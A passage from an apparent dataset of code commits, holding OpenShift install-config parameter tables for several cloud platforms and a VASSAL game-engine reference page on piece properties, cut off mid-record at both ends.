parameters\n[cols=\".^2m,.^3a,^5a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`compute.platform.openstack.rootVolume.size`\n|For compute machines, the size in gigabytes of the root volume. If you do not set this value, machines use ephemeral storage.\n|Integer, for example `30`.\n\n|`compute.platform.openstack.rootVolume.type`\n|For compute machines, the root volume's type.\n|String, for example `performance`.\n\n|`controlPlane.platform.openstack.rootVolume.size`\n|For control plane machines, the size in gigabytes of the root volume. If you do not set this value, machines use ephemeral storage.\n|Integer, for example `30`.\n\n|`controlPlane.platform.openstack.rootVolume.type`\n|For control plane machines, the root volume's type.\n|String, for example `performance`.\n\n|`platform.openstack.cloud`\n|The name of the {rh-openstack} cloud to use from the list of clouds in the\n`clouds.yaml` file.\n|String, for example `MyCloud`.\n\n|`platform.openstack.externalNetwork`\n|The {rh-openstack} external network name to be used for installation.\n|String, for example `external`.\n\n|`platform.openstack.computeFlavor`\n|The {rh-openstack} flavor to use for control plane and compute machines.\n\nThis property is deprecated. To use a flavor as the default for all machine pools, add it as the value of the `type` key in the `platform.openstack.defaultMachinePlatform` property. You can also set a flavor value for each machine pool individually.\n\n|String, for example `m1.xlarge`.\n|====\n\n.Optional {rh-openstack} parameters\n[%header, cols=\".^2,.^3,.^5a\"]\n|====\n|Parameter|Description|Values\n\n|`compute.platform.openstack.additionalNetworkIDs`\n|Additional networks that are associated with compute machines. Allowed address pairs are not created for additional networks.\n|A list of one or more UUIDs as strings. For example, `fa806b2f-ac49-4bce-b9db-124bc64209bf`.\n\n|`compute.platform.openstack.additionalSecurityGroupIDs`\n|Additional security groups that are associated with compute machines.\n|A list of one or more UUIDs as strings. For example, `7ee219f3-d2e9-48a1-96c2-e7429f1b0da7`.\n\n|`compute.platform.openstack.zones`\n|{rh-openstack} Compute (Nova) availability zones (AZs) to install machines on. If this parameter is not set, the installer relies on the default settings for Nova that the {rh-openstack} administrator configured.\n\nOn clusters that use Kuryr, {rh-openstack} Octavia does not support availability zones. Load balancers and, if you are using the Amphora provider driver, {product-title} services that rely on Amphora VMs, are not created according to the value of this property.\n|A list of strings. For example, `[\"zone-1\", \"zone-2\"]`.\n\n|`controlPlane.platform.openstack.additionalNetworkIDs`\n|Additional networks that are associated with control plane machines. Allowed address pairs are not created for additional networks.\n|A list of one or more UUIDs as strings. For example, `fa806b2f-ac49-4bce-b9db-124bc64209bf`.\n\n|`controlPlane.platform.openstack.additionalSecurityGroupIDs`\n|Additional security groups that are associated with control plane machines.\n|A list of one or more UUIDs as strings. For example, `7ee219f3-d2e9-48a1-96c2-e7429f1b0da7`.\n\n|`controlPlane.platform.openstack.zones`\n|{rh-openstack} Compute (Nova) availability zones (AZs) to install machines on. If this parameter is not set, the installer relies on the default settings for Nova that the {rh-openstack} administrator configured.\n\nOn clusters that use Kuryr, {rh-openstack} Octavia does not support availability zones. Load balancers and, if you are using the Amphora provider driver, {product-title} services that rely on Amphora VMs, are not created according to the value of this property.\n|A list of strings. For example, `[\"zone-1\", \"zone-2\"]`.\n\n|`platform.openstack.clusterOSImage`\n|The location from which the installer downloads the {op-system} image.\n\nYou must set this parameter to perform an installation in a restricted network.\n|An HTTP or HTTPS URL, optionally with an SHA-256 checksum.\n\nFor example, `\\http:\/\/mirror.example.com\/images\/rhcos-43.81.201912131630.0-openstack.x86_64.qcow2.gz?sha256=ffebbd68e8a1f2a245ca19522c16c86f67f9ac8e4e0c1f0a812b068b16f7265d`.\nThe value can also be the name of an existing Glance image, for example `my-rhcos`.\n\n|`platform.openstack.clusterOSImageProperties`\n|Properties to add to the installer-uploaded ClusterOSImage in Glance. This property is ignored if `platform.openstack.clusterOSImage` is set to an existing Glance image.\n\nYou can use this property to exceed the default persistent volume (PV) limit for {rh-openstack} of 26 PVs per node. To exceed the limit, set the `hw_scsi_model` property value to `virtio-scsi` and the `hw_disk_bus` value to `scsi`.\n\nYou can also use this property to enable the QEMU guest agent by including the `hw_qemu_guest_agent` property with a value of `yes`.\n|A list of key-value string pairs. For example, `[\"hw_scsi_model\": \"virtio-scsi\", \"hw_disk_bus\": \"scsi\"]`.\n\n|`platform.openstack.defaultMachinePlatform`\n|The default machine pool platform configuration.\n|\n[source,json]\n----\n{\n \"type\": \"ml.large\",\n \"rootVolume\": {\n \"size\": 30,\n \"type\": \"performance\"\n }\n}\n----\n\n|`platform.openstack.ingressFloatingIP`\n|An existing floating IP address to associate with the Ingress port. To use this property, you must also define the `platform.openstack.externalNetwork` property.\n|An IP address, for example `128.0.0.1`.\n\n|`platform.openstack.apiFloatingIP`\n|An existing floating IP address to associate with the API load balancer. To use this property, you must also define the `platform.openstack.externalNetwork` property.\n|An IP address, for example `128.0.0.1`.\n\n|`platform.openstack.externalDNS`\n|IP addresses for external DNS servers that cluster instances use for DNS resolution.\n|A list of IP addresses as strings. For example, `[\"8.8.8.8\", \"192.168.1.12\"]`.\n\n|`platform.openstack.machinesSubnet`\n|The UUID of a {rh-openstack} subnet that the cluster's nodes use. Nodes and virtual IP (VIP) ports are created on this subnet.\n\nThe first item in `networking.machineNetwork` must match the value of `machinesSubnet`.\n\nIf you deploy to a custom subnet, you cannot specify an external DNS server to the {product-title} installer. Instead, link:https:\/\/access.redhat.com\/documentation\/en-us\/red_hat_openstack_platform\/16.0\/html\/command_line_interface_reference\/subnet[add DNS to the subnet in {rh-openstack}].\n\n|A UUID as a string. For example, `fa806b2f-ac49-4bce-b9db-124bc64209bf`.\n|====\nendif::osp[]\n\nifdef::azure[]\n.Additional Azure parameters\n[cols=\".^2,.^3a,.^3a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`controlPlane.platform.azure.osDisk.diskSizeGB`\n|The Azure disk size for the VM.\n|Integer that represents the size of the disk in GB. The minimum supported disk size is `1024`.\n\n|`platform.azure.baseDomainResourceGroupName`\n|The name of the resource group that contains the DNS zone for your base domain.\n|String, for example `production_cluster`.\n\n|`platform.azure.resourceGroupName`\n| The name of an already existing resource group to install your cluster to. This resource group must be empty and only used for this specific cluster; the cluster components assume ownership of all resources in the resource group. If you limit the service principal scope of the installation program to this resource group, you must ensure all other resources used by the installation program in your environment have the necessary permissions, such as the public DNS zone and virtual network. Destroying the cluster using the installation program deletes this resource group.\n|String, for example `existing_resource_group`.\n\n|`platform.azure.outboundType`\n|The outbound routing strategy used to connect your cluster to the internet. If\nyou are using user-defined routing, you must have pre-existing networking\navailable where the outbound routing has already been configured prior to\ninstalling a cluster. The installation program is not responsible for\nconfiguring user-defined routing.\n|`LoadBalancer` or `UserDefinedRouting`. The default is `LoadBalancer`.\n\n|`platform.azure.region`\n|The name of the Azure region that hosts your cluster.\n|Any valid region name, such as `centralus`.\n\n|`platform.azure.zone`\n|List of availability zones to place machines in. For high availability, specify\nat least two zones.\n|List of zones, for example `[\"1\", \"2\", \"3\"]`.\n\n|`platform.azure.networkResourceGroupName`\n|The name of the resource group that contains the existing VNet that you want to deploy your cluster to. This name cannot be the same as the `platform.azure.baseDomainResourceGroupName`.\n|String.\n\n|`platform.azure.virtualNetwork`\n|The name of the existing VNet that you want to deploy your cluster to.\n|String.\n\n|`platform.azure.controlPlaneSubnet`\n|The name of the existing subnet in your VNet that you want to deploy your control plane machines to.\n|Valid CIDR, for example `10.0.0.0\/16`.\n\n|`platform.azure.computeSubnet`\n|The name of the existing subnet in your VNet that you want to deploy your compute machines to.\n|Valid CIDR, for example `10.0.0.0\/16`.\n\n|`platform.azure.cloudName`\n|The name of the Azure cloud environment that is used to configure the Azure SDK with the appropriate Azure API endpoints. If empty, the default value `AzurePublicCloud` is used.\n|Any valid cloud environment, such as `AzurePublicCloud` or `AzureUSGovernmentCloud`.\n\n|====\n\n[NOTE]\n====\nYou cannot customize\nlink:https:\/\/azure.microsoft.com\/en-us\/global-infrastructure\/availability-zones\/[Azure Availability Zones]\nor\nlink:https:\/\/docs.microsoft.com\/en-us\/azure\/azure-resource-manager\/resource-group-using-tags[Use tags to organize your Azure resources]\nwith an Azure cluster.\n====\nendif::azure[]\n\n\nifdef::gcp[]\n.Additional Google Cloud Platform (GCP) parameters\n[cols=\".^2,.^3a,.^3a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`platform.gcp.network`\n|The name of the existing VPC that you want to deploy your cluster to.\n|String.\n\n|`platform.gcp.type`\n|The link:https:\/\/cloud.google.com\/compute\/docs\/machine-types[GCP machine type].\n|The GCP machine type.\n\n|`platform.gcp.zones`\n|The availability zones where the installation program creates machines for the specified MachinePool.\n|A list of valid link:https:\/\/cloud.google.com\/compute\/docs\/regions-zones#available[GCP availability zones], such as `us-central1-a`, in a\nlink:https:\/\/yaml.org\/spec\/1.2\/spec.html#sequence\/\/[YAML sequence].\n\n|`platform.gcp.controlPlaneSubnet`\n|The name of the existing subnet in your VPC that you want to deploy your control plane machines to.\n|The subnet name.\n\n|`platform.gcp.computeSubnet`\n|The name of the existing subnet in your VPC that you want to deploy your compute machines to.\n|The subnet name.\n\n|`controlPlane.platform.gcp.osDisk.encryptionKey.kmsKey.name`\n|The name of the customer managed encryption key to be used for control plane machine disk encryption.\n|The encryption key name.\n\n|`controlPlane.platform.gcp.osDisk.encryptionKey.kmsKey.keyRing`\n|For control plane machines, the name of the KMS key ring to which the KMS key belongs.\n|The KMS key ring name.\n\n|`controlPlane.platform.gcp.osDisk.encryptionKey.kmsKey.location`\n|For control plane machines, the GCP location in which the key ring exists. For more information on KMS locations, see Google's documentation on link:https:\/\/cloud.google.com\/kms\/docs\/locations[Cloud KMS locations].\n|The GCP location for the key ring.\n\n|`controlPlane.platform.gcp.osDisk.encryptionKey.kmsKey.projectID`\n|For control plane machines, the ID of the project in which the KMS key ring exists. This value defaults to the VM project ID if not set.\n|The GCP project ID.\n\n\/\/\/\/\n`controlPlane.platform.gcp.osDisk.encryptionKey.kmsKeyServiceAccount`\n\nThe GCP Compute Engine System service account used for the encryption request for the given KMS key. The Compute Engine default service account is always used for control plane machines during installation, which follows this pattern: `service-<project_number>@compute-system.iam.gserviceaccount.com`. The default service account must have access to the KMS key specified for the control plane machines. The custom service account defined is available for use during post-installation operations. For more information on GCP service accounts, see Google's documentation on link:https:\/\/cloud.google.com\/iam\/docs\/service-accounts#types[Types of service accounts].\n\nThe GCP Compute Engine System service account email, like `<service_account_name>@<project_id>.iam.gserviceaccount.com`.\n\/\/\/\/\n\/\/ kmsKeyServiceAccount not yet fully supported in 4.7. Re-add when more stable.\n\n|`compute.platform.gcp.osDisk.encryptionKey.kmsKey.name`\n|The name of the customer managed encryption key to be used for compute machine disk encryption.\n|The encryption key name.\n\n|`compute.platform.gcp.osDisk.encryptionKey.kmsKey.keyRing`\n|For compute machines, the name of the KMS key ring to which the KMS key belongs.\n|The KMS key ring name.\n\n|`compute.platform.gcp.osDisk.encryptionKey.kmsKey.location`\n|For compute machines, the GCP location in which the key ring exists. For more information on KMS locations, see Google's documentation on link:https:\/\/cloud.google.com\/kms\/docs\/locations[Cloud KMS locations].\n|The GCP location for the key ring.\n\n|`compute.platform.gcp.osDisk.encryptionKey.kmsKey.projectID`\n|For compute machines, the ID of the project in which the KMS key ring exists. This value defaults to the VM project ID if not set.\n|The GCP project ID.\n\n\/\/\/\/\n`compute.platform.gcp.osDisk.encryptionKey.kmsKeyServiceAccount`\n\nFor compute machines, the GCP Compute Engine System service account used for the encryption request for the given KMS key. If left undefined, the Compute Engine default service account is used, which follows this pattern: `service-<project_number>@compute-system.iam.gserviceaccount.com`. For more information on GCP service accounts, see Google's documentation on link:https:\/\/cloud.google.com\/iam\/docs\/service-accounts#types[Types of service accounts].\n\nThe GCP Compute Engine System service account email, like `<service_account_name>@<project_id>.iam.gserviceaccount.com`.\n\/\/\/\/\n\/\/ kmsKeyServiceAccount not yet fully supported in 4.7. Re-add when more stable.\n|====\n\nendif::gcp[]\n\nifdef::rhv[]\n\n.Additional {rh-virtualization-first} parameters for clusters\n[cols=\".^2,.^3a,.^3a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`platform.ovirt.ovirt_cluster_id`\n|Required. The Cluster where the VMs will be created.\n|String. For example: `68833f9f-e89c-4891-b768-e2ba0815b76b`\n\n|`platform.ovirt.ovirt_storage_domain_id`\n|Required. The Storage Domain ID where the VM disks will be created.\n|String. For example: `ed7b0f4e-0e96-492a-8fff-279213ee1468`\n\n|`platform.ovirt.ovirt_network_name`\n|Required. The network name where the VM nics will be created.\n|String. For example: `ocpcluster`\n\n|`platform.ovirt.vnicProfileID`\n|Required. The vNIC profile ID of the VM network interfaces. This can be inferred if the cluster network has a single profile.\n|String. For example: `3fa86930-0be5-4052-b667-b79f0a729692`\n\n|`platform.ovirt.api_vip`\n|Required. An IP address on the machine network that will be assigned to the API virtual IP (VIP). You can access the OpenShift API at this endpoint.\n|String. Example: `10.46.8.230`\n\n|`platform.ovirt.ingress_vip`\n|Required. An IP address on the machine network that will be assigned to the Ingress virtual IP (VIP).\n|String. Example: `10.46.8.232`\n|====\n\n\n.Additional {rh-virtualization} parameters for machine pools\n[cols=\".^2,.^3a,.^3a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`<machine-pool>.platform.ovirt.cpu`\n|Optional. Defines the CPU of the VM.\n|Object\n\n|`<machine-pool>.platform.ovirt.cpu.cores`\n|Required if you use `<machine-pool>.platform.ovirt.cpu`. The number of cores. Total virtual CPUs (vCPUs) is cores * sockets.\n|Integer\n\n|`<machine-pool>.platform.ovirt.cpu.sockets`\n|Required if you use `<machine-pool>.platform.ovirt.cpu`. The number of sockets per core. Total virtual CPUs (vCPUs) is cores * sockets.\n|Integer\n\n|`<machine-pool>.platform.ovirt.memoryMB`\n|Optional. Memory of the VM in MiB.\n|Integer\n\n|`<machine-pool>.platform.ovirt.instanceTypeID`\n|Optional. An instance type UUID, such as `00000009-0009-0009-0009-0000000000f1`, which you can get from the `https:\/\/<engine-fqdn>\/ovirt-engine\/api\/instancetypes` endpoint.\n|String of UUID\n\n|`<machine-pool>.platform.ovirt.osDisk`\n|Optional. Defines the first and bootable disk of the VM.\n|String\n\n|`<machine-pool>.platform.ovirt.osDisk.sizeGB`\n|Required if you use `<machine-pool>.platform.ovirt.osDisk`. Size of the disk in GiB.\n|Number\n\n|`<machine-pool>.platform.ovirt.vmType`\n|Optional. The VM workload type, such as `high-performance`, `server`, or `desktop`.\n|String\n|====\n\n[NOTE]\n====\nYou can replace `<machine-pool>` with `controlPlane` or `compute`.\n====\n\nendif::rhv[]\n\nifdef::vsphere,vmc[]\n.Additional VMware vSphere cluster parameters\n[cols=\".^2,.^3a,.^3a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`platform.vsphere.vCenter`\n|The fully-qualified host name or IP address of the vCenter server.\n|String\n\n|`platform.vsphere.username`\n|The user name to use to connect to the vCenter instance with. This user must have at least\nthe roles and privileges that are required for\nlink:https:\/\/vmware.github.io\/vsphere-storage-for-kubernetes\/documentation\/vcp-roles.html[static or dynamic persistent volume provisioning]\nin vSphere.\n|String\n\n|`platform.vsphere.password`\n|The password for the vCenter user name.\n|String\n\n|`platform.vsphere.datacenter`\n|The name of the datacenter to use in the vCenter instance.\n|String\n\n|`platform.vsphere.defaultDatastore`\n|The name of the default datastore to use for provisioning volumes.\n|String\n\n|`platform.vsphere.folder`\n|_Optional_. The absolute path of an existing folder where the installation program creates the virtual machines. If you do not provide this value, the installation program creates a folder that is named with the infrastructure ID in the datacenter virtual machine folder.\n|String, for example, `\/<datacenter_name>\/vm\/<folder_name>\/<subfolder_name>`.\n\n|`platform.vsphere.network`\n|The network in the vCenter instance that contains the virtual IP addresses and DNS records that you configured.\n|String\n\n|`platform.vsphere.cluster`\n|The vCenter cluster to install the {product-title} cluster in.\n|String\n\n|`platform.vsphere.apiVIP`\n|The virtual IP (VIP) address that you configured for control plane API access.\n|An IP address, for example `128.0.0.1`.\n\n|`platform.vsphere.ingressVIP`\n|The virtual IP (VIP) address that you configured for cluster ingress.\n|An IP address, for example `128.0.0.1`.\n|====\n\n.Optional VMware vSphere machine pool parameters\n[cols=\".^2,.^3a,.^3a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`platform.vsphere.clusterOSImage`\n|The location from which the installer downloads the {op-system} image. You must set this parameter to perform an installation in a restricted network.\n|An HTTP or HTTPS URL, optionally with a SHA-256 checksum. For example, `\\https:\/\/mirror.openshift.com\/images\/rhcos-<version>-vmware.<architecture>.ova`.\n\n|`platform.vsphere.osDisk.diskSizeGB`\n|The size of the disk in gigabytes.\n|Integer\n\n|`platform.vsphere.cpus`\n|The total number of virtual processor cores to assign a virtual machine.\n|Integer\n\n|`platform.vsphere.coresPerSocket`\n|The number of cores per socket in a virtual machine. The number of virtual CPUs (vCPUs) on the virtual machine is `platform.vsphere.cpus`\/`platform.vsphere.coresPerSocket`. The default value is `1`\n|Integer\n\n|`platform.vsphere.memoryMB`\n|The size of a virtual machine's memory in megabytes.\n|Integer\n|====\n\nendif::vsphere,vmc[]\n\nifeval::[\"{context}\" == \"installing-aws-customizations\"]\n:!aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-government-region\"]\n:!aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-network-customizations\"]\n:!aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-private\"]\n:!aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-vpc\"]\n:!aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-customizations\"]\n:!azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-government-region\"]\n:!azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-network-customizations\"]\n:!azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-private\"]\n:!azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-vnet\"]\n:!azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-customizations\"]\n:!gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-private\"]\n:!gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-network-customizations\"]\n:!gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-vpc\"]\n:!gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-customizations\"]\n:!aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-installer-custom\"]\n:!osp:\n:!osp-custom:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-installer-kuryr\"]\n:!osp:\n:!osp-kuryr:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-user\"]\n:!osp:\n:!osp-custom:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-user-kuryr\"]\n:!osp:\n:!osp-kuryr:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-user-sr-iov\"]\n:!osp:\n:!osp-custom:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-user-sr-iov-kuryr\"]\n:!osp:\n:!osp-kuryr:\nendif::[]\nifeval::[\"{context}\" == \"installing-rhv-customizations\"]\n:!rhv:\nendif::[]\nifeval::[\"{context}\" == \"installing-vsphere-installer-provisioned-customizations\"]\n:!vsphere:\nendif::[]\nifeval::[\"{context}\" == \"installing-vsphere-installer-provisioned-network-customizations\"]\n:!vsphere:\nendif::[]\nifeval::[\"{context}\" == \"installing-vmc-customizations\"]\n:!vmc:\nendif::[]\nifeval::[\"{context}\" == \"installing-vmc-network-customizations\"]\n:!vmc:\nendif::[]\nifeval::[\"{context}\" == \"installing-restricted-networks-vmc\"]\n:!vmc:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-installer-restricted\"]\n:!osp:\n:!osp-custom:\nendif::[]\nifeval::[\"{context}\" == \"installing-restricted-networks-installer-provisioned-vsphere\"]\n:!vsphere:\nendif::[]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e82de7410374bce3874aa997638580ae2d51086d","subject":"Fixed Properties reference docs.","message":"Fixed Properties reference docs.\n","repos":"ethaneldridge\/vassal,ethaneldridge\/vassal,ethaneldridge\/vassal","old_file":"vassal-doc\/src\/main\/readme-referencemanual\/ReferenceManual\/Properties.adoc","new_file":"vassal-doc\/src\/main\/readme-referencemanual\/ReferenceManual\/Properties.adoc","new_contents":"== VASSAL Reference Manual\n[#top]\n\n[.small]#<<index.adoc#toc,Home>> > <<GameModule.adoc#top,Module>> > <<PieceWindow.adoc#top,Game Piece Palette>> > <<GamePiece.adoc#top,Game Piece>> > *Properties*#\n\n'''''\n\n=== Properties\n\nA Property is like a variable in programming: it has a _value_ which can be referenced by including its _name_ in <<Expression.adoc#top,Expressions>>, <<MessageFormat.adoc#top,Message Formats>> and other similar fields.\nMost types of Property have their values change through the course of the game.\nSome Properties can have their values set by commands provided in Game Pieces themselves; others have their values set by the system and cannot be changed from within the module.\n\nEach Game Piece has its own set of properties (each with a name and a value) that can be used for identification by various components.\nYou can add your own new properties to a Game Piece _explicitly_ by adding <<DynamicProperty.adoc#top,Dynamic Property>> traits to create values which can be changed during the course of the game and <<PropertyMarker.adoc#top,Marker>> traits for properties whose values will remain constant.\nSystem-defined properties are also added _implicitly_ when other traits are added (see below). <<GlobalProperties.adoc#top,Global Properties>> can also be defined for a Zone, a Map or for the entire module.\nIf a referenced Property name is not defined in a Game Piece, the VASSAL looks for the value in the Zone containing the piece, then in the Map containing the piece, then in the module.\n\nProperties can be matched using <<Expression.adoc#top,Expressions>> like _name == value_ for an exact match, _name != value_ for a non-match, or _name =~ value_ for a https:\/\/docs.oracle.com\/javase\/7\/docs\/api\/java\/util\/regex\/Pattern.html[regular expression] match.\nFor properties that return a numeric value (e.g.\nthe level in a <<Layer.adoc#Properties,Layer)>> you can use _<_, _<=_, _>_, and _>=._ You can combine expressions using && for logical AND and || for a logical OR.\n\n*Components that use properties*\n\n* Any <<MessageFormat.adoc#top,Message Format>> defined in a Game Piece will substitute values for the properties defined on that Game Piece.\n\n* The <<Map.adoc#GlobalKeyCommand,Global Key Command>> component uses properties to determine which pieces will respond to the command.\n* The <<Map.adoc#GamePieceLayers,Game Piece Layers>> component uses properties to determine relative ordering when drawing pieces on the map.\n* The <<TriggerAction.adoc#top,Trigger Action>> trait uses properties to determine when to fire a Key Command or <<NamedKeyCommand.adoc#top,Named Key Command>> .\n* The <<Label.adoc#top,Text Label>> trait substitutes properties when setting the text of the label.\n* A <<ZonedGrid.adoc#Zone,Zone>> uses properties to specify a <<ZonedGrid.adoc#ZoneHighlighter,Zone Highlighter>>.\n\n*Properties defined by Game Pieces*\n\n* The <<BasicPiece.adoc#top,Basic Piece>> defines properties related to a piece's name, location, side, and whether it's selected.\n\n* The <<Layer.adoc#Properties,Layer>> trait defines properties related to the state of that Layer.\n* The <<Rotate.adoc#top,Rotate>> trait defines properties related to the current facing of the piece.\n\n* The <<Label.adoc#top,Text Label>> trait returns the value of the label as a property.\n* The <<PropertyMarker.adoc#top,Marker>> trait allows you to define your own static properties.\n* The <<DynamicProperty.adoc#top,Dynamic Property>> trait allows you to define your own changeable properties.\n\n* The <<MarkMoved.adoc#top,Mark When Moved>> trait sets a property when a piece has moved.\n* The <<Mask.adoc#Properties,Mask>> trait sets a property when the piece is masked.\n* The <<Hideable.adoc#top,Invisible>> trait sets a property when the piece is invisible.\n\n* The <<PropertySheet.adoc#top,Property Sheet>> trait exposes a set of user-editable properties.\n\n*Properties defined by other components*\n\n* The <<GlobalProperties.adoc#top,Global Property>> component defines properties for a <<ZonedGrid.adoc#Zone,Zone>>, <<Map.adoc#top,Map>> or the <<GameModule.adoc#top,module>>.\n* The <<GlobalOptions.adoc#top,Global Options>> component allows you to tie property values to preferences settings.\n* The results of a roll by a <<GameModule.adoc#DiceButton,Dice Button>> is exposed as a property\n* A <<Deck.adoc#top,Deck>> component exposes the number of cards remaining as a Map-level property.\n\n==== Handy Combined List of VASSAL-defined Properties for Game Pieces\n\n|===\n|Property |Trait |Description\n|*BasicName* |<<BasicPiece.adoc#top,Basic Piece>> |The basic name of the piece.\n|*ClickedX* |Basic Piece |Map X-coordinate where player last right-clicked on piece to bring up context menu (or 0 if never).\n|*ClickedY* |Basic Piece |Map Y-coordinate where player last right-clicked on piece to bring up context menu (or 0 if never).\n|*CurrentBoard* |Basic Piece |Current Board name or \"\" if not on a map.\n|*CurrentMap* |Basic Piece |Current Map name or \"\" if not on a map.\n|*CurrentX* |Basic Piece |Current X-coordinate of the piece.\n|*CurrentY* |Basic Piece |Current Y-coordinate of the piece.\n|*CurrentZone* |Basic Piece |Current Zone name if the current map has a <<ZonedGrid.adoc#top,multi-zoned grid>>, or \"\" if the piece is not in any zone, or not on a map.\n|*DeckName* |Basic Piece |Current Deck name if stacked in a <<Deck.adoc#top,Deck>>, or \"\" if not in a Deck.\n|*IgnoreGrid* |<<NonStacking.adoc#top,Does not stack>> |\"true\" if this piece ignores the map grid when moving.\n|*Immobile* |<<NonStacking.adoc#top,Does not stack>> |\"true\" if this piece cannot be moved by drag and drop.\n|*Invisible* |<<Hideable.adoc#top,Invisible>> |\"true\" if this piece is invisible to the current player.\n|*InvisibleToOthers* |<<Hideable.adoc#top,Invisible>> |\"true\" if this piece is invisible to other players.\n|*LocationName* |Basic Piece |Name of the piece's current location, as determined by the map's <<ZonedGrid.adoc#Zone,Zone>> (if any) and grid settings.\n|*Moved* |<<MarkMoved.adoc#top,Mark When Moved>> |\"true\" if this piece has moved since the last time its movement history was cleared.\n|*NoStack* |<<NonStacking.adoc#top,Does not stack>> |\"true\" if this piece cannot stack with other pieces.\n|*Obscured* |<<Mask.adoc#top,Mask>> |\"true\" if this piece is masked from the current player.\n|*ObscuredToOthers* |<<Mask.adoc#top,Mask>> |\"true\" if this piece is masked from other players.\n|*OldBoard* |Basic Piece |Board name prior to most recent movement.\n|*OldLocationName* |Basic Piece |Location name prior to most recent movement.\n|*OldMap* |Basic Piece |Map name prior to most recent movement.\n|*OldX* |Basic Piece |X coordinate prior to most recent movement.\n|*OldY* |Basic Piece |Y coordinate prior to most recent movement.\n|*OldZone* |Basic Piece |Zone name prior to most recent movement.\n|*PieceName* |Basic Piece |Full piece name including both Basic Name and all additional strings provided by traits.\n|*playerSide* |Basic Piece |Side of the current player (not the side of the piece).\n|*Restricted* |<<RestrictedAccess.adoc#top,Restricted Access>> |\"true\" if there are restrictions as to who can access this piece.\n|*Selected* |Basic Piece |\"true\" if the piece is currently selected.\n|*_<property_name>_* |<<PropertySheet.adoc#top,PropertySheet>> |The value of each property on the Property Sheet can be accessed via the property name.\n|*_<layername>__Active* |<<Layer.adoc#top,Layer>> |\"true\" if the Layer _<layername>_ is currently active.\n|*_<layername>__Image* |<<Layer.adoc#top,Layer>> |The image name of the currently active layer for _Layer_ _<layername>_.\n|*_<layername>__Level* |<<Layer.adoc#top,Layer>> |The level number of the currently active layer for _Layer_ _<layername>_.\n|*_<layername>__Name* |<<Layer.adoc#top,Layer>> |The level name of the currently active layer for _Layer_ _<layername>_.\n|*_<rotatename>__Facing* |<<Rotate.adoc#top,Can Rotate>> |The current facing number (1, 2, etc) for the _Can Rotate_ trait _<rotatename>_.\n|*_<rotatename>__Degrees* |<<Rotate.adoc#top,Can Rotate>> |The current degrees of rotation for the _Can Rotate_ trait _<name>_.\n|_<Property Name>_ |<<Label.adoc#top,Text Label>> |If the \"Property Name\" field in the trait is filled out, then a property with that name will be filled with the current value of the _Text Label_ trait's Text field.\n|*_<deckname>__numPieces* |<<Deck.adoc#top,Deck>> (Map level property) |Number of pieces\/\"cards\" in the _Deck_ _<deckname>_.\n|*_<deckname>___<expression_name>_* |<<Deck.adoc#top,Deck>> (Map level property) |The number of pieces\/\"cards\" for which the named expression evaluates to true in the _Deck_ _<deckname>_.\n|===\n","old_contents":"== VASSAL Reference Manual\n[#top]\n\n[.small]#<<index.adoc#toc,Home>> > <<GameModule.adoc#top,Module>> > <<PieceWindow.adoc#top,Game Piece Palette>> > <<GamePiece.adoc#top,Game Piece>> > *Properties*#\n\n'''''\n\n=== Properties\n\n[width=\"100%\",cols=\"34%,33%,33%\",]\n|===\na|\nA Property is like a variable in programming: it has a _value_ which can be referenced by including its _name_ in <<Expression.adoc#top,Expressions>>, <<MessageFormat.adoc#top,Message Formats>> and other similar fields.\nMost types of Property have their values change through the course of the game.\nSome Properties can have their values set by commands provided in Game Pieces themselves; others have their values set by the system and cannot be changed from within the module.\n\nEach Game Piece has its own set of properties (each with a name and a value) that can be used for identification by various components.\nYou can add your own new properties to a Game Piece _explicitly_ by adding <<DynamicProperty.adoc#top,Dynamic Property>> traits to create values which can be changed during the course of the game and <<PropertyMarker.adoc#top,Marker>> traits for properties whose values will remain constant.\nSystem-defined properties are also added _implicitly_ when other traits are added (see below). <<GlobalProperties.adoc#top,Global Properties>> can also be defined for a Zone, a Map or for the entire module.\nIf a referenced Property name is not defined in a Game Piece, the VASSAL looks for the value in the Zone containing the piece, then in the Map containing the piece, then in the module.\n\nProperties can be matched using <<Expression.adoc#top,Expressions>> like _name == value_ for an exact match, _name != value_ for a non-match, or _name =~ value_ for a https:\/\/docs.oracle.com\/javase\/7\/docs\/api\/java\/util\/regex\/Pattern.html[regular expression] match.\nFor properties that return a numeric value (e.g.\nthe level in a <<Layer.adoc#Properties,Layer)>> you can use _<_, _<=_, _>_, and _>=._ You can combine expressions using && for logical AND and || for a logical OR.\n\n*Components that use properties*\n\n* Any <<MessageFormat.adoc#top,Message Format>> defined in a Game Piece will substitute values for the properties defined on that Game Piece.\n\n* The <<Map.adoc#GlobalKeyCommand,Global Key Command>> component uses properties to determine which pieces will respond to the command.\n* The <<Map.adoc#GamePieceLayers,Game Piece Layers>> component uses properties to determine relative ordering when drawing pieces on the map.\n* The <<TriggerAction.adoc#top,Trigger Action>> trait uses properties to determine when to fire a Key Command or 